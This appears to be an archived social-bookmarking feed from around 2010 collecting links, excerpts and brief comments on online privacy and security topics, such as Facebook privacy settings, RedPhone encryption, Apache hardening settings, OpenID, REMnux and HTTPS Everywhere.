Encrypted VOIP and SMS for Android phones.
crypto apps for the Android phone: voip and secure text
RedPhone provides end-to-end encryption for your calls, securing your conversations so that nobody can listen in. It's easy to use, and functions just like the normal dialer you're accustomed to. RedPhone uses your normal mobile number for addressing, so there's no need to have yet another identifier or account name; if you know someone's mobile number you know how to call them using RedPhone. And when you receive a RedPhone call your phone will ring just like normal, even if it is asleep.
apophenia » Blog Archive » Facebook is a utility; utilities get regulated
http://www.zephoria.org/thoughts/archives/2010/05/15/facebook-is-a-utility-utilities-get-regulated.html
From day one, Mark Zuckerberg wanted Facebook to become a social utility. He succeeded. Facebook is now a utility for many. The problem with utilities is that they get regulated
Brilliant insight. RT @jangles: More on Facebook: reading @zephoria 's thought-provoking "Facebook is a utility" http://is.gd/cb5ij [from http://twitter.com/PaulSweeney/statuses/14083869118]
"Facebook speaks of itself as a utility while also telling people they have a choice. But there’s a conflict here. We know this conflict deeply in the United States. When it comes to utilities like water, power, sewage, Internet, etc., I am constantly told that I have a choice. But like hell I’d choose Comcast if I had a choice. Still, I subscribe to Comcast. Begrudgingly. Because the “choice” I have is Internet or no Internet. I hate all of the utilities in my life. Venomous hatred. And because they’re monopolies, they feel no need to make me appreciate them. Cuz they know that I’m not going to give up water, power, sewage, or the Internet out of spite. Nor will most people give up Facebook, regardless of how much they grow to hate them."
Facebook & Radical Transparency http://bit.ly/9eVJMe, a rant by @zephoria, with a follow-up http://bit.ly/b69GjU [from http://twitter.com/CircleReader/statuses/14075940793]
How Secure Is My Password?
http://howsecureismypassword.net/
How to check whether your password is secure
It would take About 700 million years for a desktop PC to crack your password
How to Return Facebook's Privacy Settings to What You Signed Up For
http://lifehacker.com/5549394/how-to-return-facebook-privacy-settings-to-what-you-signed-up-for
Good reminder RT @MR21c How to Return Facebook Privacy Settings to What You Signed Up For http://bit.ly/d7VapU via @lifehacker
"Online privacy expectations are evolving, but whether Facebook likes it or not, a lot of us want the privacy settings we signed up for when we joined the service. Here's how to use Facebook's new privacy controls to regain your original privacy."
Facebook Search
http://willmoffat.github.com/FacebookSearch/
Want to easily see public status updates on Facebook? See OpenBook: http://bit.ly/dsvSnT (I recommend "drunk prom") Le sigh. – danah boyd (zephoria) http://twitter.com/zephoria/statuses/14126705736
RT @zephoria: Want to easily see public status updates on Facebook? See OpenBook: http://bit.ly/dsvSnT (I recommend "drunk prom") Le sigh.
open graph + "s="
There's a new Facebook search site out there with a concept similar to PleaseRobMe, a site that demonstrates just how easy it is for bad guys to use social networking crap to tell when you're away from your home. This new Facebook Search allows anyone to search for potentially embarrassing updates that can now be viewed by the public.
Facebook Status Search
The minimum Apache settings you should have in place when publishing a site | バシャログ。
http://c-brains.jp/blog/wsg/10/07/05-115821.php
Apache configuration tips.
memo
Pointless. If you're going to bother hiding the version, just keep it updated properly. Well, there is the benefit of saving a little bandwidth.
httpd.conf
# Enable persistent connections
KeepAlive On
# Exclude IE
SetEnvIf User-Agent ".*MSIE.*" \
    nokeepalive ssl-unclean-shutdown \
    downgrade-1.0 force-response-1.0
# Suppress server details in the HTTP headers
ServerTokens Prod
# Suppress the server signature on error pages
ServerSignature Off
# Disable the TRACE method
TraceEnable Off

php.ini
; Suppress the PHP version in the HTTP headers
expose_php = Off
OpenDNS > FamilyShield
http://www.opendns.com/familyshield/
The single easiest way to keep your kids safe online — and away from adult websites — on your home Internet for free. No software to install.
Web filtering via DNS
Family filter
free to block adult web content and phishing sites
Content filtering at the DNS level
ImperialViolet - Overclocking SSL
http://www.imperialviolet.org/2010/06/25/overclocking-ssl.html
SSL is not expensive
How to Set Up OpenID on Your Own Domain | Smarterware
http://smarterware.org/6286/how-to-set-up-openid-on-your-own-domain
Thanking @ginatrapani
OpenID
using Google.
For some reason I was under the mistaken impression that setting up an OpenID on my own domain, ginatrapani.org, would be a big hassle: that I'd have to host my own OpenID server software and that it would take all sorts of installation and maintenance BS to do so. I feel strongly about owning my identity online, mapping it to my nameplate domain, and actively choosing an authorizing party instead of just accepting the sign-in service du jour like Facebook, Twitter, Yahoo, or Google. Still, I never got set up with OpenID on ginatrapani.org because my perceived hassle factor was daunting. Instead, I used idproxy.net for my OpenID and put the domain setup on my "someday I have to do that" list. It meant that my OpenID was ginatrapani.idproxy.net instead of my own domain. Idproxy is a great service and I thank them for getting me started with OpenID; but still, I want my OpenID URL to be a domain name I own and control.
Profiles as an OpenID provider and to Chris for a great discussion of OpenID, OAuth, and verifying identity on the web.
Facebook Privacy Settings: How To Fix Your Profile In 2 Minutes (VIDEO)
http://www.huffingtonpost.com/2010/05/13/facebook-privacy-settings_n_575732.html
I thought I had done enough to reasonably privatize my Facebook settings... this video showed me a couple things I had missed.
Here's everything you need to know to go back to the old days when you could control your privacy on Facebook with just a few clicks.
The Price of Facebook Privacy? Start Clicking - NYTimes.com
http://www.nytimes.com/2010/05/13/technology/personaltech/13basics.html
how nytimes surfaces complex graphics in articles
Which is longer: Facebook privacy policy or the US Constitution?
If you guessed the latter, you’re right. Facebook’s Privacy Policy is 5,830 words long; the United States Constitution, without any of its amendments, is a concise 4,543 words.
How-to: Effectively manage your Facebook privacy settings with three simple lists -- Engadget
http://www.engadget.com/2010/07/13/how-to-effectively-manage-your-facebook-privacy-settings-with-l/
I used to love Facebook. I was in law school at Wisconsin when it launched, and everyone I knew on the site was basically a peer -- people who I'd known well or at least met in person at some point. Then... I graduated. Suddenly having a Facebook account full of pictures from blurry nights in Madison and Pulitzer Prize-caliber dirty jokes from my friends wasn't so awesome anymore -- especially once I started working for Engadget and lots and lots of people I didn't actually know (or, somewhat even worse, only knew professionally) started looking at my personal page. So I needed a system -- a way to still use Facebook to share personal stuff with friends, professional stuff with colleagues, and awesome stuff with everyone, all without blurring any lines or accidentally sharing too much with people I don't know.
Law, technology, crawlers and me - 最速転職研究会
http://d.hatena.ne.jp/mala/20100707/1278514965
About crawlers. For when you build bots or crawlers.
How crawlers should be implemented, and how to deal with crawlers.
REMnux: A Linux Distribution for Reverse-Engineering Malware
http://zeltser.com/remnux/
An Ubuntu-based GNU/Linux distribution aimed at analyzing malware.
REMnux is designed for running services that are useful to emulate within an isolated laboratory environment when performing behavioral malware analysis. As part of this process, the analyst typically infects another laboratory system with the malware sample and directs potentially-malicious connections to the REMnux system that's listening on the appropriate ports.
REMnux is a lightweight Linux distribution for assisting malware analysts in reverse-engineering malicious software. The distribution is based on Ubuntu and is maintained by Lenny Zeltser.
Top Secret America | washingtonpost.com
http://projects.washingtonpost.com/top-secret-america/
Top Secret America (Washington Post)
One of the best uses of Flash to display data that I've ever seen.
A hidden world, growing beyond control | washingtonpost.com
http://projects.washingtonpost.com/top-secret-america/articles/a-hidden-world-growing-beyond-control/
These are some of the results of an investigation carried out over two years by the Washington Post. @riotta says on Twitter that there are no scoops, though.
Great piece of journalism from Washington Post: Top Secret America, A hidden world, growing beyond control. http://is.gd/dyx7L #Terrorism
Interesting.
The top-secret world the government created in response to the terrorist attacks of Sept. 11, 2001, has become so large, so unwieldy and so secretive that no one knows how much money it costs, how many people it employs, how many programs exist within it or exactly how many agencies do the same work.
A hidden world, growing beyond control | washingtonpost.com
http://projects.washingtonpost.com/top-secret-america/articles/
tl;dr Government is too big.
To ensure that the country's most sensitive duties are carried out only by people loyal above all to the nation's interest, federal rules say contractors may not perform what are called "inherently government functions." But they do, all the time and in every intelligence and counterterrorism agency, according to a two-year investigation by The Washington Post. What started as a temporary fix in response to the terrorist attacks has turned into a dependency that calls into question whether the federal workforce includes too many people obligated to shareholders rather than the public interest -- and whether the government is still in control of its most sensitive activities.
RT @redlog: RT @ananny Phenomenally good reporting from the Washington Post: "Top Secret America", http://bit.ly/9Ja5Fi
Special investigations into the US government
9 Things You Should Be Doing With Your Server, But Probably Aren't - RoundHouse Managed Server Support
http://www.roundhousesupport.com/blog/9-things-you-should-be-doing-with-your-server-but-probably-arent
HASHCRACK.COM - Reverse Hash Lookup for MD5, SHA1, MySQL, NTLM and Lanman-Password-Hashes
http://hashcrack.com/index.php
Encrypt the Web with the HTTPS Everywhere Firefox Extension | Electronic Frontier Foundation
http://www.eff.org/deeplinks/2010/06/encrypt-web-https-everywhere-firefox-extension
Technical Analysis by Peter Eckersley. Today EFF and the Tor Project are launching a public beta of a new Firefox extension called HTTPS Everywhere.
Encrypt the Web with the HTTPS Everywhere Firefox Extension | Electronic Frontier Foundation http://bit.ly/9PRtyX
This Firefox extension was inspired by the launch of Google's encrypted search option. We wanted a way to ensure that every search our browsers sent was encrypted. At the same time, we were also able to encrypt most or all of the browser's communications with some other sites:
* Google Search
* Wikipedia
* Twitter and Identi.ca
* Facebook
* EFF and Tor
* Ixquick, DuckDuckGo, Scroogle and other small search engines
* and lots more!
Secure Passwords - Explained by Common Craft - Common Craft - Our Product is Explanation
http://www.commoncraft.com/secure-passwords-video
Explaining the necessity of having a secure password.
Explained by Common Craft